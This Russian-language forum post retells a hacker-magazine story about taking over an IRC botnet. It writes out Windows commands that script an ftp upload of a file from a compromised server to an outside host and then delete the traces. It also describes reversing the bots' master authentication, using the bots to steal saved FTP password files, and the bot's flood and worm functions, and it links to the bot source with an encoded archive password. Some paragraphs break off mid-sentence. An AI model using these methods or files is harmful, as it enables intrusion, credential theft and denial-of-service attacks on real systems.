Тема: 
Интернет под угрозой военных ботов....
Нашумевшие истории крупных взломов
Человеческая жизнь насыщена забавными вещами. Причем компьютерная жизнь тоже. Был случай, когда после сканирования одного сервера на наличие уязвимостей, взломщик наткнулся на нечто необычное... Это дало ему возможность взять под контроль тысячи серверов. Неожиданно? Несомненно! О том, как это произошло, я и расскажу.
Лиха беда начало
Все началось банально - кому-то по каким-то причинам не понравился какой-то сервер. От нечего делать взломщик, за спиной которого было порядка сотни порутанных систем, запустил свой любимый LANguard Scanner (http://www.gfisoftware.com/stats/adentry.asp?adv=58&loc=4). Через несколько минут программа показала хакеру около 80 живых адресов из сегмента просканенной сетки. Вяло перелистывая лог, взломщик начал понимать, что так просто тачку не взять, ибо бажных сервисов на ней не наблюдалось. Тогда наш герой решил осмотреть остальные адреса в сегменте. Тут-то и началось самое интересное...
Беспорядочно тыкая в "плюсики" ЛАНгарда с целью просмотра баннеров каждого сервиса, хакер нашел живой ircd (демон ирки). Казалось бы, что тут такого? Людям свойственно общаться, и найти в инете живой ирк-сервак не составляет большого труда. Вот только вертелся он на порту 33333, и адрес сервера не был прописан в обратной зоне DNS (ip -> domain.name). Это показалось хакеру странным, поэтому он решил подцепиться к демону клиентом, чтобы узнать, на кой фиг, собственно, этот демон там нужен.
Суем свой нос
Через несколько мгновений наш герой уже сконнектился с этим загадочным ircd. По его баннеру он сразу догадался, что это был Unreal-ircd (для справки: Unreal всегда юзался в русской сети DalNetRU и имел огромное количество команд и всяких дополнительных примочек). После просмотра состояния сервера у хакера появилась мысль: "Я нашел огромную irc-сеть", потому как на сервере сидело без малого 2 тысячи юзеров (для сравнения: в самой крупной российской сети IRCNetRU в онлайне находится 2-3 тысячи человек). "Ну да ладно, посмотрим, чем тут народ занимается", - сказал себе взломщик и набрал /list. После этого у него отвисла челюсть - листинг показал всего один канал, на котором обитали те самые две тыщи пользователей. Ткнув по записи, хакер попал... да-да, хакер именно попал. В комнате тусили боты. Только боты и никого кроме ботов. Зачем кому-то понадобилось заводить столько искусственных экземпляров на один канал? Это удивило взломщика, и, зацепив свой любимый PsyBNC на этот сервер и врубив логирование канала, он решил подождать денек, чтобы понять смысл этой аномалии. Зашел он с рандомным ником и айдентом, т.к. не хотел выделяться из толпы
Ахтунг! Это враги!
Как и предполагалось, через некоторое время в IRC пришел папка-админ. Для начала он заставил ботов узнать его
В поисках приключений
Может быть, все не так сложно, как кажется на первый взгляд? С этими словами, наш герой хуизнул (/whois - команда в IRC, позволяющая узнать инфу о собеседнике
1. copy c:\winnt\system32\cmd.exe c:\cmd1.exe. Интерпретатор cmd.exe не позволит выполнить echo, если находится в родном каталоге.
2. c:\cmd1.exe /c tasklist.
Список процессов на удаленной машине выдал странноватый handle lb-1235.exe. За ним и скрывался вражеский бот. Хакер долго копался на сервере, перерыл множество каталогов и в конце концов нашел место обитания бота. Следующим его шагом был слив бота на FTP-сервер ftp.server.net. Это можно было выполнить двумя путями: командой tftp (ей требовалось наличие демона Trivial FTPD на NT-машине; доступа на такой сервер у хакера не было), либо обычной командой ftp без интерактивного режима (через сценарий). Взломщик выбрал второй вариант. Он шустренько набрал следующий блок команд:
3. c:\cmd1.exe /c @echo open ftp.server.net > c:\ftp.ini
c:\cmd1.exe /c @echo user ftp >> c:\ftp.ini
c:\cmd1.exe /c @echo pass ftp >> c:\ftp.ini
c:\cmd1.exe /c @echo put c:\winnt\deep-dir\with-bot.exe bot.exe >> c:\ftp.ini
c:\cmd1.exe /c @echo bye >> c:\ftp.ini
c:\cmd1.exe /c ftp -i -s:c:\ftp.ini
Опция -i отключает все интерактивные вопросы, а параметру -s передается имя сценария.
Сервер сдался. Он выполнил сценарий, загрузив бота на FTP-демон.
4. c:\cmd1.exe /c del c:\ftp.ini c:\cmd1.exe - заметание следов.
Анализ кода
Слив военный экземпляр с сервера, хакер стал изучать бота. Как оказалось, он скачал обычный самораспаковывающийся архив. Чтобы ненароком не заразиться, взломщик переименовал расширение файла в .zip, и открыл его стандартным менеджером. Выяснилось, что бот был написан на mIRC-скриптах и активировался обычным мирком, окно которого затем скрывалось внешней программой. В самом архиве содержался mIRC, скрывалка окон, конфиг бота и около 10 скриптов, подгружавшихся в мирк при его запуске.
Хакер открыл скрипт и был удивлен странным кодом. Дело в том, что программинг бота осуществлялся весьма нерационально и запутанно. Посидев с часок, он составил для себя небольшой список команд, при помощи которых можно проводить флуд-атаки. Разумеется, прежде чем передавать боту какие-либо команды, необходима была авторизация от ботмастера. Для это надо добиться выполнения трех условий:
1) идент мастера должен быть cafeteam;
2) мастеру нужен оп на канале;
3) мастеру необходимо передать хеш, который каким-то образом дешифровал бот.
Хакер очень заинтересовался этими ботами и захотел порулить ими на полную катушку (читай - за3.14DoSить несколько крупных серверов). Ему предстояло обмануть ботов по всем трем пунктам. Первое условие и условием-то трудно назвать - обычная смена идента. Как выполнить второе условие, взломщик также теоретически знал. Судя по коду, при передаче боту в приват строку !op "пароль", бот должен опнуть чела на канале.
С третьим условием пришлось немного попотеть. Хакер нарыл в коде процедуру дешифровки хеша, но ему предстояло написать обратную процедуру, то есть функцию по составлению последовательности магических цифр. На кодинг этого самого модуля взломщик потратил 5 часов. Давай остановимся на алгоритме составления хеша (узнаем умные методы шифрования).
Зашифровал? Расшифровывай!
Смысл шифрования заключался в следующем: бот просматривает полную маску чела, пусть это будет "[email protected]". Затем происходит порождение цикла по каждому символу этого хоста. Этот символ преобразуется в эквивалентный ему ASCII-код, который делится на текущую длину строки, а потом округляется. Затем происходит дозапись цифрового хеша в суммарную строку. Через определенное число символов происходит вставка в хеш некоторой посторонней цифры. Этот процесс повторяется до истечения длины полной маски. В завершение процедуры банальное сравнение. Если хеш, созданный ботом, совпал с последовательностью, переданной извне, то человек становится ботмастером, и боты переходят в его подчинение.
После изнурительных тестов хакер написал обратную процедуру. Это давало возможность взять под контроль тысячи ботов. Кстати, последовательность посторонних цифр оказалось очень простой - 31337
Убедившись, что, кроме него самого, на ircd не было живых обитателей, хакер запросил у бота статус оператора. Затем передал заветный хеш и получил в ответ около тысячи приветствий
Где же вы, пароли?
Кроме команд, организующих атаку, были и другие, причем не менее интересные. Например, !find disk mask искал файл на заданном диске. Ничего умного в голову не лезло, поэтому хакер заставил всех ботов найти *.dat в каталоге c:\program files\ICQ
После команды !find c:\winnt wcx_ftp.ini взломщик получил порядка десяти ссылок на указанный файл. Нет, ему совсем не нужно было вытягивать каждый ini’шник через Unicode-string. Боты были поразительно умны и понимали команду !get, переданную в приват. После нее бот передавал файл по DCC соединению. Таким образом, хакер вытянул десяток ini-файлов. В парочке из них находились довольно интересные FTP-сервера с сохраненными паролями. Если есть FTP-доступ, то, возможно, есть и SSH.
Все пароли в TotalCMD шифруются по некоторому алгоритму. Расшифровывать их самому не было никакого желания, поэтому хакер поступил иначе. Он скачал программу recover (http://www.fomichev.ru/soft/crk/recover.zip). Эта чудо-прога была обычным аналогом известного Openpass - подсматривала пароль за астериксами (звездочками). Эти звездочки можно было найти, если открыть опции FTP-сессии, предварительно закинув wcx_ftp.ini в системный каталог.
Бот улетел, но обещал вернуться!
Через несколько дней нарушитель сетевого порядка знал все команды бота. Как оказалось, представители искусственного интеллекта умели бомбить ICQ через службу Pager, делать udp-флуд, а также tcp путем "бросания" больших пакетов в заданный порт жертвы. К тому же бот являлся червяком: он постоянно сканил указанные админом диапазоны адресов и искал на них уязвимые IIS. Если находил, то сразу же заливал копию себя через FTP-сервер, распаковывал и запускал эту самую копию. Процедура размножения занимала 30 Кб mIRC-кода.
Кроме того, бот слушал порт, на котором располагался самописный баунсер. Конечно, возможности его были довольно ограниченны, но держать коннект он умел. В баунсере использовалась та же автономная авторизация, что и для бота-админа, только хеш посторонних цифр был другим
Этот материал приведен только в целях ознакомления и изучения основных действий хакера. Повторять трюки взломщика опасно для жизни - Старший Брат смотрит на тебя
Основные принципы начинающего хакера
Что же помогло хакеру в его нелегком деле?
1. Взломщик стремится к достижению своей цели любыми способами. Это видно из статьи: в одном случае он потратил на написание дешифрующей функции 5 часов, в другом - 5 минут на узнавание пароля от FTP-сессии.
--------------------------------------------------------------------------------
2. Ловкость рук и никакого мошенничества! Легко ли рыться в чужом коде и изучить его до последнего символа? Нелегко, но вполне возможно.
Экземпляр военного бота
Самих ботов можно скачать по ссылке http://www.phphost.ru/war-bot.zip. Но за ней скрывается запароленный архив, в котором лежат исходники бота, а также дешифратор. Пароль на этот архив подскажет последовательность символов "UGFzc3dkQm90" (без кавычек).
Ответить с цитированием
Сообщение от -=GDS=-
Социальные закладки